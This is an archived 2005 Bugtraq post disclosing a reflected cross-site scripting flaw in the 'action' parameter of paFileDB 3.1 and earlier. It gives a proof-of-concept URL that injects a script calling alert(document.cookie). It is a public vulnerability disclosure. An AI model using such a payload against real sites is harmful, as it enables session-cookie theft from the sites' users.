[38285] in bugtraq

home help back first fref pref prev next nref lref last post

Pafiledb ACTION Parameter XSS

daemon@ATHENA.MIT.EDU (tom cruise)
Sat Apr 9 12:08:01 2005

Date: 8 Apr 2005 21:23:59 -0000
Message-ID: <20050408212359.2387.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: tom cruise <the.n3t@gmail.com>
To: bugtraq@securityfocus.com




Vulnerable System : 
paFileDB 3.1
and less

exploit : 
http://[target]/pafiledb.php?action=">&lt;script&gt;alert(document.cookie)&lt;/script&gt;

discovered by : neO 

SecurityGurus Team
www.securitygurus.net

home help back first fref pref prev next nref lref last post